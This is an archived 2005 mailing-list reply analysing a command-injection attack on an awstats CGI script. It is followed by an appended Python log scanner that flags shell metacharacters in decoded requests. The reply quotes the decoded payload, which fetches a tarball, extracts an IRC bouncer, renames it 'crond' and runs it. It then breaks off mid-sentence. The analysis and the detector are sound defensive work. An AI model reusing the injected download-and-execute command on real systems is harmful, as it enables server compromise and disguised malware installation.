Security Breach

Paul Howarth paul at
Fri Mar 4 19:30:23 UTC 2005

On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> > Replace the url-encoded characters and you get:
> > 
> > /cgi-bin/|echo ;echo b_exp;cd /tmp;curl -0 wget 
> >;tar -zxvf badboy.tar.gz;cd psybnc;mv 
> > mech crond;export PATH=;crond;echo e_exp;%00
> > 
> > So the attacker has tricked the script into executing a set of shell 
> > commands, which include changing directory to /tmp, downloading a 
> > tarball from a Romanian site, extracting that tarball and then executing 
> > a program from the downloaded and extracted tarball, after renaming it 
> > to "crond" in an effort to disguise it.
>    Damned fine research.  Good job; I'm impressed.

Thank you!

Incidentally, some of the suggestions that came up earlier in this
discussion, namely mounting /tmp with the noexec option and running
SELinux, would have foiled *this particular* exploit of the awstats
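
The decoding step described in the quoted message, as an added example that is not part of the original post: a Python sketch that percent-decodes request targets from an access log and flags decoded shell metacharacters. The log lines, client addresses, the script name `stats.pl` and the parameter name `dir` are constructed placeholders; only the decoded command fragments mirror the ones quoted above.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (Apache combined format); hosts and script name are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [04/Mar/2005:10:00:01 +0000] "GET /cgi-bin/stats.pl?month=03&year=2005 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.77 - - [04/Mar/2005:10:02:13 +0000] "GET /cgi-bin/stats.pl?dir=%7Cecho%20%3Becho%20b_exp%3Bcd%20%2Ftmp%3Becho%20e_exp%3B%2500 HTTP/1.0" 200 312 "-" "-"
192.0.2.11 - - [04/Mar/2005:10:03:40 +0000] "GET /docs/a%20b.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Patterns checked against the fully decoded request target.
INDICATORS = {
    "pipe": re.compile(r"\|"),
    "command-separator": re.compile(r";|&&|`|\$\("),
    "null-byte": re.compile(r"%00|\x00"),
    "tmp-path": re.compile(r"/tmp\b"),
}

def decode_target(target, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded bytes such as %2500 surface."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan(log_text):
    """Return one finding per log line whose decoded target matches an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        decoded = decode_target(target)
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append({"client": client, "status": int(status),
                             "decoded": decoded, "hits": hits})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["client"], f["status"], f["hits"], repr(f["decoded"]))
```

A 200 status on a flagged line only shows that the script answered, so the host still has to be checked for the dropped files and renamed process.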

